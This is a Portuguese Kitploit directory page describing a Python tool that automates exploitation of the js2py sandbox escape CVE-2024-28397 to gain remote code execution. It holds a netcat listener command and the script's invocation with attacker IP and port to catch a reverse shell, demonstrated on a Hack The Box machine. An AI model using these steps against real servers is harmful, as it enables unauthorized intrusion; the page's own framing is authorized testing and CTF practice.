Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-28397-Exploit-Automation — Um script de automação em Python para explorar a vulnerabilidade **js2py Sandbox Escape** (CVE-2024-28397). Esta ferramenta automatiza o processo de geração e entrega de payload para alcançar Execução Remota de Código (RCE) em instâncias vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/l1337xi/cve-2024-28397-exploit-automation
Geração de PayloadsExploraçãoExploração de Aplicações WebCTFAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubl1337xi/cve-2024-28397-exploit-automation

CVE-2024-28397-Exploit-Automation

Um script de automação em Python para explorar a vulnerabilidade **js2py Sandbox Escape** (CVE-2024-28397). Esta ferramenta automatiza o processo de geração e entrega de payload para alcançar Execução Remota de Código (RCE) em instâncias vulneráveis.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
2há 8 mesesAinda não revisado

Automação de Exploit CVE-2024-28397

Um script de automação em Python para explorar a vulnerabilidade js2py Sandbox Escape (CVE-2024-28397). Esta ferramenta automatiza o processo de geração e entrega de payload para obter Execução Remota de Código (RCE) em instâncias vulneráveis.

⚠️ Aviso Legal O uso desta ferramenta para atacar alvos sem consentimento mútuo prévio é ilegal. Este repositório é apenas para fins educacionais. O autor não é responsável por qualquer uso indevido destas informações. Esta ferramenta destina-se a ser utilizada em avaliações de segurança autorizadas e ambientes Capture The Flag (CTF).

🧐 Sobre a Vulnerabilidade

CVE-2024-28397 afeta a biblioteca js2py (versões < 0.74). A biblioteca falha em isolar adequadamente o ambiente JavaScript do ambiente Python hospedeiro.

  • A Falha: Sanitização inadequada de entrada permite acesso aos atributos internos do Python __class__ e __subclasses__.
  • O Impacto: Um atacante pode percorrer a hierarquia de objetos para acessar subprocess.Popen, permitindo a execução arbitrária de comandos no servidor hospedeiro.

🚀 Recursos

  • Geração Automatizada de Payload: Constrói automaticamente a lógica de escape do sandbox JavaScript.
  • Codificação Base64: Lida com a codificação do payload para evitar erros de sintaxe durante a transmissão.
  • Tratamento de Conexão: Detecta execução bem-sucedida do shell com base em timeouts de requisição.
  • Saída Profissional: Interface CLI limpa com atualizações de status.

🛠️ Uso

Pré-requisitos

root@kitploit:~
pip install requests

Inicie seu Netcat Listener:

root@kitploit:~
nc -lvnp 1337

Execute o Script:

root@kitploit:~
python3 exploit.py -u <url alvo> -i <ip atacante> -p <porta atacante>

📸 Prova de Conceito

Aqui está a ferramenta em ação contra um alvo vulnerável (Hack The Box - CodeTwo):

1. Execução

Executando o exploit para gerar o payload e acionar o callback: crop3

2. Sucesso

Recebendo o reverse shell no listener: Sucesso do Reverse Shell

  • 📜 Créditos

  • Descoberta da Vulnerabilidade & Payload JS Principal: Marven11

  • Script de Automação: L1337Xi

  • Colaboradores:

    • Leyn4L
    • iamrizwanvp
    • axai457
Baixar ferramenta